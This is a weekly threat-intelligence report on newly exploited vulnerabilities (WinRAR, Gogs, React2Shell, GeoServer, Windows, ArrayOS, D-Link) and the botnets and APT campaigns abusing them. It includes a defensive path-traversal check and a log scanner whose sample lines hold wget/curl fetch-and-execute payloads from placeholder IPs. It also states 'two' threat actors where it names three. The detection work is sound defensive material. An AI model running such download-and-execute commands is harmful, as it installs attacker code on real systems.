Executive Summary
This week’s threat landscape saw significant activity across multiple vendors and platforms, marked by the addition of 6 new vulnerabilities to the CISA Known Exploited Vulnerabilities (KEV) catalog. These include a zero-day in Microsoft Windows under active exploitation, a flaw in Array Networks appliances, a critical Meta React Server vulnerability, a path traversal issue in RARLAB WinRAR, an Improper Restriction of XML External Entity Reference vulnerability in OSGeo GeoServer, and a three-year-old D-Link vulnerability affecting EoL devices. Active exploitation was also observed against Gogs self-hosted Git services, underscoring continued attacker interest in developer infrastructure.
Botnet operators such as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud environments, routers, and web applications, leveraging misconfigurations and outdated systems to expand their foothold.
Reports further indicate extensive exploitation of the WinRAR vulnerability by multiple threat actors, while the React2Shell flaw in React Server Components experienced a rapid surge in abuse following public disclosure and its recent inclusion in the CISA KEV.
Key points:
- 6 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity.
- Active exploitation observed in the Gogs self-hosted Git service.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- Multiple threat actors abused the React2Shell and WinRAR vulnerabilities.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-6218 - Path Traversal Vulnerability in RARLAB WinRAR
A Path Traversal vulnerability in RARLAB WinRAR allows attackers to craft specially designed archive files that manipulate extraction paths and force WinRAR, RAR, UnRAR, or UnRAR.dll to place files outside the intended directory, potentially resulting in arbitrary code execution under the current user's context. The flaw arises from improper handling and validation of file paths within archive contents, enabling directory traversal sequences to be abused during extraction. This vulnerability affects WinRAR versions 7.11 and earlier, and a proof-of-concept is available, raising the risk of exploitation. Although it was patched in June 2025 with the release of version 7.12, it is now listed in the CISA KEV catalog.
CVE-2025-8110 - Symlink Path Traversal Vulnerability in the Gogs self-hosted Git service
A Symlink Path Traversal vulnerability in the Gogs self-hosted Git service enables remote code execution by allowing attackers to write files outside intended repository boundaries. Gogs, a lightweight Git platform written in Go and widely adopted for its simplicity and low resource footprint, is susceptible because CVE-2025-8110 effectively bypasses the earlier fix for CVE-2024-55947, reopening a path to RCE. Wiz researchers have confirmed that this vulnerability is actively exploited in the wild, with attackers creating rogue repositories to gain execution on exposed servers. No official patch has been released yet; therefore, immediate mitigations include disabling open user registration, isolating the service behind a VPN or IP allow-list, and checking for suspicious repositories, particularly those with random eight-character names created around July 10th.
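As an added defensive illustration (not WinRAR's, Gogs' or any vendor's code), the check below shows how an extractor or repository writer can reject both traversal primitives described for CVE-2025-6218 and CVE-2025-8110: member names that climb out of the destination directory, and writes routed through a symlink already planted inside the tree that points outside it. The destination directory, the planted link and the member names are constructed for the demo.

```python
import os
import tempfile
from typing import Dict, Optional


def is_within(dest: str, target: str) -> bool:
    """True if target resolves (symlinks followed) to a location inside dest."""
    dest_real = os.path.realpath(dest)
    target_real = os.path.realpath(target)
    return os.path.commonpath([dest_real, target_real]) == dest_real


def safe_extract_path(dest: str, member_name: str) -> Optional[str]:
    """Return the on-disk path for an archive member, or None to reject it.

    Rejected: absolute names, drive-letter names, '..' segments that climb
    above dest, and names routed through a symlink that already exists under
    dest and points outside it (realpath follows such links, so the resolved
    path lands outside dest and fails is_within).
    """
    name = member_name.replace("\\", "/")        # archives may mix separators
    first = name.split("/", 1)[0]
    if name.startswith("/") or ":" in first:     # absolute or C:-style name
        return None
    candidate = os.path.join(dest, *name.split("/"))
    return candidate if is_within(dest, candidate) else None


def demo() -> Dict[str, bool]:
    """Evaluate constructed member names against a scratch destination."""
    with tempfile.TemporaryDirectory() as dest:
        os.makedirs(os.path.join(dest, "docs"))
        # Constructed: a link already present in the extraction tree that points
        # one level above it, the symlink primitive described for Gogs.
        parent = os.path.dirname(os.path.realpath(dest))
        os.symlink(parent, os.path.join(dest, "escape"))
        members = [
            "docs/readme.txt",           # ordinary member: accepted
            "docs/../docs/ok.txt",       # '..' that stays inside: accepted
            "../../outside.txt",         # classic traversal: rejected
            "..\\..\\outside.txt",       # same with backslashes: rejected
            "/etc/outside.txt",          # absolute name: rejected
            "C:/outside.txt",            # drive-letter name: rejected
            "escape/outside.txt",        # write through planted symlink: rejected
        ]
        return {m: safe_extract_path(dest, m) is not None for m in members}


if __name__ == "__main__":
    for member, accepted in demo().items():
        print(f"{'ACCEPT' if accepted else 'REJECT'}  {member}")
```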
CVE-2025-55182 - Remote Code Execution Vulnerability in Meta React Server Components
A Pre-Authentication Remote Code Execution vulnerability in the react-server package, caused by insecure deserialization, allows attackers to achieve unauthenticated RCE across systems supporting React Server Components. Dubbed React2Shell, this flaw enables arbitrary command execution even in applications that do not explicitly use server functions, posing a critical risk to modern web environments. The vulnerability affects multiple packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack, all widely integrated within the React ecosystem. AWS has released updated, patched versions to address this issue. This vulnerability has also been added to the CISA KEV catalog.
CVE-2025-58360 - Improper Restriction of XML External Entity Reference Vulnerability in OSGeo GeoServer
An Improper Restriction of XML External Entity Reference (XXE) vulnerability in OSGeo GeoServer allows attackers to supply crafted XML input via the /geoserver/wms GetMap operation, enabling the definition of external entities that can be abused to read arbitrary files from the server, conduct server-side request forgery (SSRF), or trigger denial-of-service conditions by exhausting system resources. The flaw affects GeoServer versions from 2.26.0 to before 2.26.2 and versions prior to 2.25.6, with security fixes delivered in GeoServer 2.25.6, 2.26.3, and 2.27.0 as part of the November patch release; despite remediation being available, the vulnerability has now been added to the CISA KEV catalog.
CVE-2025-62221 - Use-After-Free Vulnerability in Microsoft Windows
A Use-After-Free vulnerability in Microsoft Windows enables a local, authenticated attacker to perform privilege escalation, ultimately gaining SYSTEM-level access. The flaw resides in the Windows Cloud Files Mini Filter Driver, where improper memory handling allows an authorized user to elevate privileges. Microsoft confirmed that this vulnerability was exploited in the wild as a zero-day, though no technical exploitation details, threat actor information, or activity scope have been disclosed. The issue has been patched through a Microsoft security update and has been added to the CISA KEV catalog.
CVE-2025-66644 - OS Command Injection Vulnerability in Array Networks ArrayOS AG
An OS Command Injection vulnerability in Array Networks ArrayOS AG allows attackers to execute arbitrary commands on affected secure access gateway appliances, with all versions prior to 9.4.5.9 impacted. These SSL VPN-based AG series devices are widely used by large organizations for remote and distributed workforce access, making exploitation highly consequential. According to JPCERT/CC, the flaw has been actively exploited since at least August, with threat actors targeting Japanese organizations to deploy persistent backdoors, including PHP webshells dropped at /ca/aproxy/webapp/. The activity was further linked to the IP address 194.233.100[.]138, used for both initial compromise and command-and-control operations, indicating a coordinated campaign. The vulnerability was patched in ArrayOS 9.4.5.9 and has been added to the CISA KEV catalog.
CVE-2022-37055 - Buffer Overflow Vulnerability in D-Link Routers
A Buffer Overflow vulnerability in D-Link GO-RT-AC750 routers significantly impacts confidentiality, integrity, and availability, affecting versions GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02. The flaw resides in the router's web interface components (cgibin and hnap_main), where improper memory handling allows attackers to overwrite memory beyond allocated boundaries. This vulnerability is particularly dangerous as it can be exploited remotely without authentication, requires low attack complexity, and needs no user interaction, making Internet-facing devices highly exposed. D-Link confirmed the products are End of Life (EoL) and End of Service (EoS), leaving replacement as the recommended mitigation. The issue has been added to the CISA KEV catalog.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
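The following is an added detection example (not part of the report or of any Cytellite or MISP tooling) that applies the indicator described above, a wget or curl fetch from a bare IP address inside a request, to constructed web access-log lines; the log lines, source addresses and payload addresses are made up for the demo using documentation address ranges.

```python
import re
from urllib.parse import unquote_plus

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# wget/curl fetching from a literal IPv4 address, optionally with port and path
FETCH_FROM_IP = re.compile(
    rf"\b(wget|curl)\b[^;|&]*?(?:https?://)?({IPV4})(?::\d+)?(?:/[^\s;|&]*)?", re.I)
# follow-on execution of whatever was fetched (chmod, pipe to a shell, ./file)
EXEC_CHAIN = re.compile(r"(\bchmod\s+\S+|\|\s*(?:ba)?sh\b|(?:^|[;&|]\s*)\./\S+)", re.I)
# source address and request target from a combined-format access-log line
REQUEST_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT)\s+(\S+)')


def analyse_request(request_target: str):
    """Return a finding if the request target carries a fetch-from-IP payload, else None."""
    decoded = unquote_plus(request_target)   # payloads arrive URL-encoded
    fetch = FETCH_FROM_IP.search(decoded)
    if not fetch:
        return None
    return {
        "tool": fetch.group(1).lower(),
        "payload_ip": fetch.group(2),
        "exec_chain": bool(EXEC_CHAIN.search(decoded)),
    }


def scan_log(lines):
    """Run analyse_request over access-log lines, keeping source IP and request path."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        hit = analyse_request(m.group(2))
        if hit:
            findings.append({"source_ip": m.group(1),
                             "path": m.group(2).split("?")[0], **hit})
    return findings


# Constructed access-log lines (RFC 5737 documentation addresses), not real telemetry.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2025:10:01:02 +0000] "GET /cgi-bin/luci?cmd=cd+/tmp;wget+http://198.51.100.23/bins/arm7;chmod+777+arm7;./arm7 HTTP/1.1" 200 -',
    '203.0.113.8 - - [10/Dec/2025:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Dec/2025:10:02:11 +0000] "GET /shell?cd+/tmp;curl+-s+198.51.100.45:8080/x.sh|sh HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A fetch from a hostname rather than an IP is deliberately not matched, mirroring the indicator as the report states it; widen FETCH_FROM_IP if your environment wants any download cradle flagged.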
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
According to multiple reports from BI.ZONE, Foresiet, SecPod, and Synaptic Security, CVE-2025-6218 has been exploited by two distinct threat actors, including GOFFEE (also known as Paper Werewolf), Bitter (APT-C-08 or Manlinghua), and Gamaredon. Analysis published in August 2025 indicated that GOFFEE likely exploited CVE-2025-6218 in conjunction with CVE-2025-8088, another WinRAR path traversal flaw, during phishing attacks against organizations in Russia in July 2025. Further reporting showed that the South Asia-focused Bitter APT weaponized the vulnerability to achieve persistence and deploy a C# trojan via a lightweight downloader delivered through a RAR archive titled "Provision of Information for Sectoral for AJK.rar," which contained a benign Word document paired with a malicious macro template. Additional intelligence confirmed that the Russian threat group Gamaredon leveraged CVE-2025-6218 in phishing campaigns targeting Ukrainian military, governmental, political, and administrative sectors, using the flaw to deliver the Pteranodon malware, with activity first observed in November 2025.
Mass Exploitation of React2Shell
A coordinated wave of exploitation targeting CVE-2025-55182 (React2Shell) emerged within hours of disclosure, with reports from Amazon Web Services (AWS) and Huntress attributing early activity to China-linked threat actors Earth Lamia and Jackpot Panda, who weaponized the React Server Components (RSC) vulnerability to achieve unauthenticated remote code execution. Observed intrusions involved the deployment of payloads such as the PeerBlight Linux backdoor, the CowTunnel reverse proxy tunnel, the ZinFoq Go-based post-exploitation implant, and the wocaosinm.sh Kaiji DDoS malware variant, alongside discovery commands, command-and-control retrieval attempts, exploitation of publicly available GitHub tools to identify vulnerable Next.js instances, and delivery of the XMRig cryptocurrency miner, with notable targeting of construction and entertainment sectors as of December 8, 2025. Subsequent analysis from Palo Alto Networks Unit 42 identified activity overlapping with the Contagious Interview campaign through the delivery of EtherRAT, BPFDoor, and Auto-Color.
Additional intelligence from VulnCheck highlighted extensive exploitation attempts linked to the RondoDox botnet, aligning with global abuse patterns for React2Shell, while Unit 42 also confirmed more than 30 affected organizations and identified activity consistent with UNC5174 (CL-STA-1015) involving SNOWLIGHT, VShell, Cobalt Strike, interactive web shells, and various commodity malware families, including the cross-platform backdoor Noodle RAT (ANGRYREBEL/Nood RAT). Reporting from abuse.ch further revealed exploitation of the vulnerability leading to Mirai botnet infections, demonstrating the widespread and multifaceted abuse of this critical flaw across diverse threat ecosystems.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
This week’s findings underscore the speed and scale at which attackers exploit newly disclosed and unpatched vulnerabilities, especially across outdated and exposed systems. The rapid abuse of React2Shell, WinRAR, and cloud-facing services highlights the growing need for continuous monitoring and actionable intelligence. As exploitation trends intensify, organizations must strengthen visibility and prioritize remediation based on real-world threat activity. Loginsoft Vulnerability Intelligence (LOVI) empowers teams with timely insights into exploited vulnerabilities and active campaigns, enabling faster, risk-driven defenses.
FAQs:
1) What is React2Shell and why is it appealing for threat actors?
A: React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.
2) What are EOL and EOS, and why do they matter for vulnerability and patch management?
A: EOL (End of Life) and EOS (End of Service) indicate that a product no longer receives updates, patches, or vendor support. Systems in EOL/EOS state become high-risk because newly discovered vulnerabilities remain unpatched, making them prime targets for exploitation.
3) What does “PoC available” mean, and why does it increase risk for a vulnerability?
A: “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.
4) Why do attackers continue to exploit older vulnerabilities even when patches exist?
A: Attackers frequently target outdated or unpatched systems because many organizations delay updates, run legacy equipment, or rely on unsupported software. These gaps create predictable entry points that threat actors can exploit with minimal effort, making old vulnerabilities just as dangerous as new ones.